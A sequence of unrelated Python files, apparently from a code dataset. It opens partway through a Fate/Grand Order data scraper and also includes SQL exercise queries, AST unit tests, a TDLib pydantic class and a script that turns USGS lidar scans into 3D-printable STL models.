(sep_w + (w - text_w) / 2, h + sep_t + (sep_b - text_h) / 2),
text,
font=font,
fill="gray",
)
return bg
def _init_data(self):
self.ALL_CHAR = [
FgoChar(
name=value["名称"],
star=int(value["星级"]),
limited=True
if not ("圣晶石召唤" in value["入手方式"] or "圣晶石召唤(Story卡池)" in value["入手方式"])
else False,
)
for value in self.load_data().values()
]
self.ALL_CARD = [
FgoCard(name=value["名称"], star=int(value["星级"]), limited=False)
for value in self.load_data("fgo_card.json").values()
]
async def _update_info(self):
# fgo.json
fgo_info = {}
for i in range(500):
url = f"http://fgo.vgtime.com/servant/ajax?card=&wd=&ids=&sort=12777&o=desc&pn={i}"
result = await self.get_url(url)
if not result:
logger.warning(f"更新 {self.game_name_cn} page {i} 出错")
continue
fgo_data = json.loads(result)
if int(fgo_data["nums"]) <= 0:
break
for x in fgo_data["data"]:
name = remove_prohibited_str(x["name"])
member_dict = {
"id": x["id"],
"card_id": x["charid"],
"头像": x["icon"],
"名称": remove_prohibited_str(x["name"]),
"职阶": x["classes"],
"星级": int(x["star"]),
"hp": x["lvmax4hp"],
"atk": x["lvmax4atk"],
"card_quick": x["cardquick"],
"card_arts": x["cardarts"],
"card_buster": x["cardbuster"],
"宝具": x["tprop"],
}
fgo_info[name] = member_dict
        # update extra info
for key in fgo_info.keys():
url = f'http://fgo.vgtime.com/servant/{fgo_info[key]["id"]}'
result = await self.get_url(url)
if not result:
fgo_info[key]["入手方式"] = ["圣晶石召唤"]
logger.warning(f"{self.game_name_cn} 获取额外信息错误 {key}")
continue
try:
dom = etree.HTML(result, etree.HTMLParser())
obtain = dom.xpath(
"//table[contains(string(.),'入手方式')]/tr[8]/td[3]/text()"
)[0]
obtain = str(obtain).strip()
if "限时活动免费获取 活动结束后无法获得" in obtain:
obtain = ["活动获取"]
elif "非限时UP无法获得" in obtain:
obtain = ["限时召唤"]
else:
if "&" in obtain:
obtain = obtain.split("&")
else:
obtain = obtain.split(" ")
obtain = [s.strip() for s in obtain if s.strip()]
fgo_info[key]["入手方式"] = obtain
except IndexError:
fgo_info[key]["入手方式"] = ["圣晶石召唤"]
logger.warning(f"{self.game_name_cn} 获取额外信息错误 {key}")
self.dump_data(fgo_info)
logger.info(f"{self.game_name_cn} 更新成功")
# fgo_card.json
fgo_card_info = {}
for i in range(500):
url = f"http://fgo.vgtime.com/equipment/ajax?wd=&ids=&sort=12958&o=desc&pn={i}"
result = await self.get_url(url)
if not result:
logger.warning(f"更新 {self.game_name_cn}卡牌 page {i} 出错")
continue
fgo_data = json.loads(result)
if int(fgo_data["nums"]) <= 0:
break
for x in fgo_data["data"]:
name = remove_prohibited_str(x["name"])
member_dict = {
"id": x["id"],
"card_id": x["equipid"],
"头像": x["icon"],
"名称": name,
"星级": int(x["star"]),
"hp": x["lvmax_hp"],
"atk": x["lvmax_atk"],
"skill_e": str(x["skill_e"]).split("<br />")[:-1],
}
fgo_card_info[name] = member_dict
self.dump_data(fgo_card_info, "fgo_card.json")
logger.info(f"{self.game_name_cn} 卡牌更新成功")
        # download icons
for value in fgo_info.values():
await self.download_img(value["头像"], value["名称"])
for value in fgo_card_info.values():
await self.download_img(value["头像"], value["名称"])
|
nilq/baby-python
|
python
|
"""Queries to answer following questions"""
# How many total Characters are there?
QUERY_1 = '''SELECT COUNT(*)
FROM charactercreator_character;'''
# How many of each specific subclass?
QUERY_2 = '''SELECT (
SELECT COUNT(*)
FROM charactercreator_thief
) AS thief_class,
(
SELECT COUNT(*)
FROM charactercreator_cleric
) AS cleric_class,
(
SELECT COUNT(*)
FROM charactercreator_fighter
) AS fighter_class,
(
SELECT COUNT(*)
FROM charactercreator_mage
LEFT JOIN charactercreator_necromancer
ON character_ptr_id = mage_ptr_id
WHERE mage_ptr_id IS NOT NULL
) AS Necromancer_class,
(SELECT COUNT(*)
FROM charactercreator_mage
LEFT JOIN charactercreator_necromancer
ON character_ptr_id = mage_ptr_id
WHERE mage_ptr_id IS NULL
) AS Mage_class'''
# How many total items?
QUERY_3 = '''SELECT COUNT(*)
FROM armory_item;'''
# How many of the items are weapons? How many are not?
QUERY_4 = '''SELECT COUNT(*)
FROM armory_weapon;'''
QUERY_5 = '''SELECT COUNT(*)
FROM armory_item
LEFT JOIN armory_weapon
on item_id = item_ptr_id
WHERE item_ptr_id IS NULL;'''
# How many items does each character have? (return first 20 rows)
# How many weapons does each character have? (return first 20 rows)
# On average, how many items does each character have?
# On average, how many weapons does each character have?
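# The sketches below are illustrative answers to the four questions above, in
# order. They assume the Django-style many-to-many join table is named
# charactercreator_character_inventory with columns character_id and item_id;
# adjust the table/column names if the actual schema differs.
QUERY_6 = '''SELECT character_id, COUNT(item_id) AS item_count
FROM charactercreator_character_inventory
GROUP BY character_id
LIMIT 20;'''
QUERY_7 = '''SELECT inv.character_id, COUNT(aw.item_ptr_id) AS weapon_count
FROM charactercreator_character_inventory AS inv
LEFT JOIN armory_weapon AS aw
ON inv.item_id = aw.item_ptr_id
GROUP BY inv.character_id
LIMIT 20;'''
QUERY_8 = '''SELECT AVG(item_count)
FROM (SELECT COUNT(item_id) AS item_count
FROM charactercreator_character_inventory
GROUP BY character_id);'''
QUERY_9 = '''SELECT AVG(weapon_count)
FROM (SELECT COUNT(aw.item_ptr_id) AS weapon_count
FROM charactercreator_character_inventory AS inv
LEFT JOIN armory_weapon AS aw
ON inv.item_id = aw.item_ptr_id
GROUP BY inv.character_id);'''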
|
nilq/baby-python
|
python
|
from astutils import ast
def test_terminal():
value = 'a'
t = ast.Terminal(value)
r = repr(t)
assert r == "Terminal('a', 'terminal')", r
r = str(t)
assert r == 'a', r
r = len(t)
assert r == 1, r
r = t.flatten()
assert r == value, r
def test_hash():
# different AST node instances should
# have different hash
#
# terminals
value = 'foo'
a = ast.Terminal(value)
b = ast.Terminal(value)
assert hash(a) != hash(b)
# operators
op = 'bar'
a = ast.Operator(op)
b = ast.Operator(op)
assert hash(a) != hash(b)
def test_eq():
value = 'a'
t = ast.Terminal(value)
p = ast.Terminal(value)
assert t == p, (t, p)
p = ast.Terminal('b')
assert t != p, (t, p)
p = ast.Terminal(value, 'number')
assert t != p, (t, p)
p = 54
assert t != p, (t, p)
def test_operator():
a = ast.Terminal('a')
b = ast.Terminal('b')
op = '+'
operands = [a, b] # 'a', 'b' fail due to `str`
t = ast.Operator(op, *operands)
r = repr(t)
r_ = (
"Operator('+', "
"Terminal('a', 'terminal'), "
"Terminal('b', 'terminal'))")
assert r == r_, r
r = str(t)
assert r == '(+ a b)', r
r = len(t)
assert r == 3, r
r = t.flatten()
assert r == '( + a, b )', r
|
nilq/baby-python
|
python
|
num1 = 111
num2 = 222
num3 = 3333333333
num3 = 333
num4 = 44444
|
nilq/baby-python
|
python
|
# =============================================================================== #
# #
# This file has been generated automatically!! Do not change this manually! #
# #
# =============================================================================== #
from __future__ import annotations
from pydantic import Field
from ..base_object import BaseObject
class ToggleSupergroupIsAllHistoryAvailable(BaseObject):
"""
Toggles whether the message history of a supergroup is available to new members; requires can_change_info administrator right
:param supergroup_id: The identifier of the supergroup
:type supergroup_id: :class:`int`
:param is_all_history_available: The new value of is_all_history_available
:type is_all_history_available: :class:`bool`
"""
ID: str = Field("toggleSupergroupIsAllHistoryAvailable", alias="@type")
supergroup_id: int
is_all_history_available: bool
@staticmethod
def read(q: dict) -> ToggleSupergroupIsAllHistoryAvailable:
return ToggleSupergroupIsAllHistoryAvailable.construct(**q)
|
nilq/baby-python
|
python
|
import os
import sys
import zipfile
import asc_parse
import wget
import multiprocessing
import urllib.request as request
from contextlib import closing
import argparse
import shutil
import glob
# A decimal value that will decrease the output file size as it increases
REDUCE_BY = 1.0
# A decimal value that artificially makes things taller as it increases
VERTICAL_SCALE = 1.0
# A decimal value that sets the base height of the model
BASE_HEIGHT = 0.0
# Disable this option if you want to generate a separate DEM/STL for each LAS tile.
MERGE_LAS = False
# Generate 3D models
GENERATE_STLS = True
# Delete LAS Directory when finished
DELETE_LAS = False
# Enabling this option will generate .prj files for each generated .asc file. This requires blast2dem,
# a closed source utility that is part of lastools. If you enable this option, lastools will be automatically
# downloaded and unzipped, however, the output may not be used for commercial purposes unless you purchase
# a lastools license. This option is only necessary if you plan on using the DEMto3D plugin that is part of
# QGIS. More information about lastools licensing is available here:
# https://lastools.github.io/LICENSE.txt
QGIS_COMPATIBLE_DEM = False
if getattr(sys, 'frozen', False):
APPLICATION_PATH = os.path.dirname(sys.executable)
elif __file__:
APPLICATION_PATH = os.path.dirname(__file__)
GRID_EXE = os.path.join(APPLICATION_PATH, "GridSurfaceCreate64.exe")
D2A_EXE = os.path.join(APPLICATION_PATH, "DTM2ASCII.exe")
LASZIP_EXE = os.path.join(APPLICATION_PATH, "laszip-cli.exe")
LASTOOLS_URL = "http://lastools.github.io/download/LAStools.zip"
BLAST2DEM_EXE = os.path.join(APPLICATION_PATH, "LAStools\\bin\\blast2dem.exe")
LAS2LAS_EXE = os.path.join(APPLICATION_PATH, "LAStools\\bin\\las2las.exe")
# lastools isn't completely free/open source, so we can't distribute it with the program.
def install_lastools():
file_name = wget.filename_from_url(LASTOOLS_URL)
if not os.path.exists(BLAST2DEM_EXE):
print('lastools missing, downloading...')
with closing(request.urlopen(LASTOOLS_URL)) as r:
with open(file_name, 'wb') as f:
shutil.copyfileobj(r, f)
with zipfile.ZipFile(file_name, "r") as zip_ref:
zip_ref.extractall("")
os.remove(file_name)
def get_file_from_url(url, file_name):
# This is a pattern you'll see several times. I don't want to have to
# redo the whole process if it fails along the way.
if os.path.exists(file_name):
print(f"{file_name} already downloaded, skipping...")
return
with closing(request.urlopen(url)) as r:
with open(file_name, 'wb') as f:
shutil.copyfileobj(r, f)
print(f"Downloaded {url}")
def unzip_to_las(file_name, las_name):
print(f'Unzipping {file_name}')
if os.path.exists(las_name):
print(f'{las_name} already exists, skipping...')
return
with zipfile.ZipFile(file_name, "r") as zip_ref:
zip_ref.extractall("LAS")
def generate_dem_from_las(las_name, dem_name, spike_filter: float = None, reduce_by: float = 1.0):
    # Build the command locally: appending to the global GRID_EXE on every call
    # would stack duplicate /spike flags across calls, and the old parameter name
    # shadowed the built-in filter().
    grid_cmd = GRID_EXE
    if spike_filter and '/spike' not in grid_cmd:
        grid_cmd += f' /spike:{spike_filter}'
    if os.path.exists(dem_name):
        print(f'{dem_name} already exists, skipping...')
        return
    print(f'Generating {dem_name}')
    os.system(f'{grid_cmd} {dem_name} {reduce_by} M M 0 0 0 0 {las_name}')
def unzip_laz_file(laz_name, las_name):
if os.path.exists(las_name):
print(f'{las_name} already exists, skipping...')
return
print(f'Unzipping {laz_name} to {las_name}')
os.system(f'{LASZIP_EXE} -i {laz_name} -o {las_name}')
def main():
global VERTICAL_SCALE
global BASE_HEIGHT
global REDUCE_BY
global MERGE_LAS
global GENERATE_STLS
global DELETE_LAS
global QGIS_COMPATIBLE_DEM
global GRID_EXE
parser = argparse.ArgumentParser(description='A utility for automatically generating 3D printable STLs from USGS lidar scans.')
# Just in case the user doesn't pass in the file name, assume it's what the USGS names it.
parser.add_argument('--input', '-i', type=str, default='downloadlist.txt', help='The name of the file containing the URLs of all of the lidar scan data.')
parser.add_argument('--reduce', '-r', type=float, default=REDUCE_BY, help='A decimal value that will decrease the output file size as it increases. The default value is 1.0')
    parser.add_argument('--vscale', '-v', type=float, default=VERTICAL_SCALE, help='A decimal value that artificially makes things taller as it increases. The default value is 1.0')
parser.add_argument('--base', '-b', type=float, default=BASE_HEIGHT, help='A decimal value that sets the base height of the model. The default value is 0.0')
parser.add_argument('--merge', '-m', action='store_true', help='Using this flag will merge all of the point clouds into one file before converting into a DEM.')
parser.add_argument('--no_stl', '-s', action='store_false', help='Using this flag will disable STL generation.')
parser.add_argument('--cleanup', '-c', action='store_true', help='Using this flag will cause the program to automatically delete the unzipped point cloud files after running.')
parser.add_argument('--filter', '-f', type=float, default=False, help='A percent value (0-100, for the slope of the points being smoothed) that will enable the spike smoothing option. This is good if you have points that are floating way up above the model and causing spikes in your final model.')
    parser.add_argument('--prj', '-p', action='store_true', help='Using this flag will cause the program to automatically download and use lastools to generate projection files for the elevation models. This is important if you want to generate the STLs yourself in QGIS, but it means you\'ll have to be mindful of lastools\' license limitations. More info on the lastools website.')
parser.add_argument('--external_files', '-e', action='store_true', default=False, help='Using this flag will grab las/laz files from the LAS directory instead of downloading them from an input list.')
#parser.add_argument('--help', '-h', action='help')
args = parser.parse_args()
VERTICAL_SCALE = args.vscale
BASE_HEIGHT = args.base
REDUCE_BY = args.reduce
MERGE_LAS = args.merge
GENERATE_STLS = args.no_stl
DELETE_LAS = args.cleanup
QGIS_COMPATIBLE_DEM=args.prj
if args.filter:
GRID_EXE += f' /spike:{args.filter}'
if not args.external_files:
# For each tile in the USGS dataset, download the zip
        list_of_urls = []
        list_of_zip = []
        # Use a context manager so the URL list file is closed once it has been read.
        with open(args.input) as f:
            for line in f:
                if not line.rstrip('\n').endswith('.zip'):
                    continue
                print(line := line.rstrip('\n'))
                file_name = wget.filename_from_url(line)
                list_of_zip.append(file_name)
                list_of_urls.append(line)
# This is the definitive list of all file names for each phase of the pipeline from here out.
list_of_files = [x.removesuffix('.zip') for x in list_of_zip]
list_of_las = [f'LAS\\{x}.las' for x in list_of_files]
if not os.path.exists('LAS'):
os.mkdir('LAS')
with multiprocessing.Pool(16) as p:
p.starmap(get_file_from_url, zip(list_of_urls, list_of_zip))
# Unzip each zip file that was downloaded
p.starmap(unzip_to_las, zip(list_of_zip, list_of_las))
list_of_laz = list(glob.glob('LAS\\*.laz'))
if list_of_laz:
print("LAZ files detected, unzipping...")
with multiprocessing.Pool() as p:
p.starmap(unzip_laz_file, zip(list_of_laz, [x.removesuffix('.laz') + '.las' for x in list_of_laz]))
list_of_las = list(glob.glob('LAS\\*.las'))
list_of_files = [os.path.basename(x).removesuffix('.las') for x in list_of_las]
if MERGE_LAS:
list_of_files = [list_of_files[0]]
# Prep the list of DTM files
list_of_dtm = [f'DTM\\{x}.dtm' for x in list_of_files]
if not os.path.exists('DTM'):
os.mkdir('DTM')
print("\nGenerating .dtm files...\n")
# If necessary, make sure all las files get combined into one DTM
if MERGE_LAS:
os.system(f'{GRID_EXE} {list_of_dtm[0]} {REDUCE_BY} M M 0 0 0 0 LAS\\*.las')
else:
with multiprocessing.Pool() as p:
p.starmap(generate_dem_from_las, zip(list_of_las, list_of_dtm, [args.filter] * len(list_of_las), [REDUCE_BY] * len(list_of_las)))
if not os.path.exists('ASC'):
os.mkdir('ASC')
list_of_asc = [f'ASC\\{x}.asc' for x in list_of_files]
# Convert all the dtm files into asc files
print("\nGenerating .asc files...\n")
    for d, a in zip(list_of_dtm, list_of_asc):
        print(a)
        if os.path.exists(a):
            # Skip .asc files that were already converted on a previous run.
            print(f'{a} already exists, skipping...')
            continue
        os.system(f'{D2A_EXE} /raster {d} {a}')
if QGIS_COMPATIBLE_DEM:
install_lastools()
list_of_prj = [f'LAS\\{x}.prj' for x in list_of_files]
# Use lastools to generate the prj file that QGIS will need
for l, p in zip(list_of_las, list_of_prj):
os.system(f'{BLAST2DEM_EXE} -i {l} -oasc')
shutil.copy(p, 'ASC')
if GENERATE_STLS:
asc_parse.gen_stls_from_ascs(
list_of_asc=list_of_asc,
list_of_files=list_of_files,
scale_adjustment=REDUCE_BY,
vscale=VERTICAL_SCALE,
base=BASE_HEIGHT,
)
# Delete the directories used for the intermediate steps
print("Cleaning up...")
if DELETE_LAS:
shutil.rmtree('LAS')
shutil.rmtree('DTM')
if __name__ == "__main__":
if sys.platform.startswith('win'):
        # On Windows, multiprocessing needs freeze_support() when the script is frozen into an executable.
multiprocessing.freeze_support()
main()
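# Example invocations (the script file name below is hypothetical; the flags map to the
# argparse options defined in main() above):
#
#   python las_to_stl.py -i downloadlist.txt -r 2.0 -v 1.5 -b 5.0 --merge
#   python las_to_stl.py --external_files --filter 75 --prj
#
# The first run downloads and unzips every .zip URL listed in downloadlist.txt, merges the
# point clouds into a single DEM, and writes STLs; the second skips the download step and
# works from whatever .las/.laz files already sit in the LAS directory.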
|
nilq/baby-python
|